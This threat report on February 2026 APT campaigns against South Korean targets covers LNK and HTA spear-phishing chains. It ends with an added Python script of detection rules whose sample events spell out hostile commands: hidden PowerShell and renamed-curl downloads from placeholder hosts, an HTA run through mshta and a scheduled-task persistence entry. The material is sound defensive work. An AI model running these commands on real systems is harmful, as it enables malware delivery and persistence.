February 2026 APT Attack Trends Report (South Korea)
Overview.
AhnLab monitored APT attacks against domestic targets during February 2026 through its infrastructure.
This report summarizes the classification, statistics, and features of each type of domestic APT attack identified during the period.
APT Domestic Attack Trends.
We found that most of the infiltrations were carried out through spear-phishing emails.
In particular, attacks using LNK files were the most common, and some CHM file-based attacks were also identified.
LNK-based attacks can be categorized into two types: Type A and Type B.
In Type A, the LNK file carries a PowerShell command that, when the shortcut is executed, connects to an external URL and downloads additional files.
In this process, curl.exe is copied and executed under a different file name, and a legitimate AutoIt executable and a malicious AutoIt script are downloaded and registered in the Task Scheduler to ensure persistence.
The malicious AutoIt script performs command execution, directory listing, and file upload/download functions.
Type B uses the curl.exe that ships with Windows to download a malicious HTA file into %TEMP% and execute it.
The malicious HTA is distributed from the threat actor’s GitHub repository or Google Drive and drops a downloader that loads an infostealer, a keylogger, and a memory-resident backdoor, which leak system information, lists of key files, and cryptocurrency-related information.
Examples of confirmed malicious file names include “NTSRefund account registration and confirmation guide.html.lnk,” “password.txt.lnk,” and “refundinquiry.pdf.lnk.”
AhnLab Response Status.
AhnLab monitored the activity with its infrastructure and collected cases.
A detailed list of samples and file names is attached to the report as the basis for the analysis.
Conclusion.
The analysis shows that this APT attack follows a typical flow: initial infiltration through spear phishing, download of malicious modules from external hosts, persistence via the Task Scheduler, information exfiltration, and remote control.
From an organizational perspective, attention should be paid to the handling of email-based malicious attachments and of LNK/HTA files.
It is important to detect abnormal copying and execution of curl.exe, monitor suspicious registrations in the Task Scheduler, and detect signs of infostealers and keyloggers.
Detailed IOCs and sample information are included in the report’s attachments.
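The attack chain described in the Type A and Type B sections above, and the three detection points this conclusion calls out, can be turned into simple process-creation rules. The following is an added example written for this summary; it is not AhnLab's code and not part of the report. It assumes Sysmon-style process-creation fields (Image, OriginalFileName, CommandLine, ParentImage), a constructed %TEMP% path for the sample host, hostnames under the reserved example.invalid domain, and that the AutoIt interpreter is invoked under its usual name AutoIt3.exe (the report does not name the binary). The sample events are constructed for illustration only.

```python
"""Process-creation detections for the LNK-delivered chain in the report.

Added example, not AhnLab's code. The events below are constructed
Sysmon-style (Event ID 1) records embedded inline so the script runs offline.
"""
import ntpath
from dataclasses import dataclass

# Constructed %TEMP% of the sample host (assumption for this example).
TEMP_DIR = r"C:\Users\victim\AppData\Local\Temp"


@dataclass
class ProcessEvent:
    """Subset of the fields a Sysmon process-creation record carries."""
    image: str          # full path of the launched binary
    original_name: str  # OriginalFileName from the PE version resource
    command_line: str
    parent_image: str


def _base(path: str) -> str:
    # ntpath handles Windows separators regardless of the analysis host's OS.
    return ntpath.basename(path).lower()


def _in_temp(text: str) -> bool:
    return TEMP_DIR.lower() in text.lower()


def powershell_url_download(ev: ProcessEvent) -> bool:
    """Type A: PowerShell launched with an external URL on its command line."""
    cl = ev.command_line.lower()
    return _base(ev.image) == "powershell.exe" and ("http://" in cl or "https://" in cl)


def renamed_curl(ev: ProcessEvent) -> bool:
    """Type A: curl.exe copied and run under another file name.
    The PE's OriginalFileName survives the rename; the on-disk name does not."""
    return ev.original_name.lower() == "curl.exe" and _base(ev.image) != "curl.exe"


def hta_in_temp(ev: ProcessEvent) -> bool:
    """Type B: curl.exe writing an .hta into %TEMP%, or mshta.exe running one from there."""
    cl = ev.command_line.lower()
    curl_or_mshta = _base(ev.image) in ("curl.exe", "mshta.exe") or ev.original_name.lower() == "curl.exe"
    return curl_or_mshta and ".hta" in cl and _in_temp(cl)


def autoit_scheduled_task(ev: ProcessEvent) -> bool:
    """Type A persistence: schtasks /create whose action runs the AutoIt interpreter.
    AutoIt3.exe is the interpreter's usual name (assumption; not named in the report)."""
    cl = ev.command_line.lower()
    return _base(ev.image) == "schtasks.exe" and "/create" in cl and "autoit3.exe" in cl


RULES = {
    "powershell_url_download": powershell_url_download,
    "renamed_curl": renamed_curl,
    "hta_in_temp": hta_in_temp,
    "autoit_scheduled_task": autoit_scheduled_task,
}


def detect(events):
    """Return (rule_name, image) for every rule each event trips."""
    return [(name, ev.image) for ev in events for name, rule in RULES.items() if rule(ev)]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed sample events: five chain stages plus two benign look-alikes.
SAMPLE_EVENTS = [
    ProcessEvent(PS, "PowerShell.EXE",
                 r'powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest http://example.invalid/s1 -OutFile ' + TEMP_DIR + r'\s1.txt"',
                 EXPLORER),
    ProcessEvent(TEMP_DIR + r"\svchost32.exe", "curl.exe",
                 r"svchost32.exe -s -o " + TEMP_DIR + r"\AutoIt3.exe http://example.invalid/a", PS),
    ProcessEvent(r"C:\Windows\System32\curl.exe", "curl.exe",
                 r"curl.exe -o " + TEMP_DIR + r"\inv.hta https://example.invalid/inv", CMD),
    ProcessEvent(r"C:\Windows\System32\mshta.exe", "MSHTA.EXE",
                 r"mshta.exe " + TEMP_DIR + r"\inv.hta", CMD),
    ProcessEvent(r"C:\Windows\System32\schtasks.exe", "schtasks.exe",
                 r'schtasks.exe /create /sc minute /mo 10 /tn "WinUpdateCheck" /tr "' + TEMP_DIR + r"\AutoIt3.exe " + TEMP_DIR + r'\cfg.au3"',
                 CMD),
    # Benign: built-in curl fetching a page, and PowerShell with no URL.
    ProcessEvent(r"C:\Windows\System32\curl.exe", "curl.exe", "curl.exe https://example.com/", CMD),
    ProcessEvent(PS, "PowerShell.EXE", "powershell.exe -Command Get-Process", EXPLORER),
]

if __name__ == "__main__":
    for rule, image in detect(SAMPLE_EVENTS):
        print(f"{rule:24} {image}")
```

Each rule keys on a property the attacker cannot easily drop without changing the behaviour the report describes: the OriginalFileName check survives the rename of curl.exe, the .hta-in-%TEMP% check fires on both the download and the mshta.exe execution, and the schtasks rule catches the persistence step regardless of the task name chosen. The two benign events show the rules stay quiet on ordinary curl and PowerShell use.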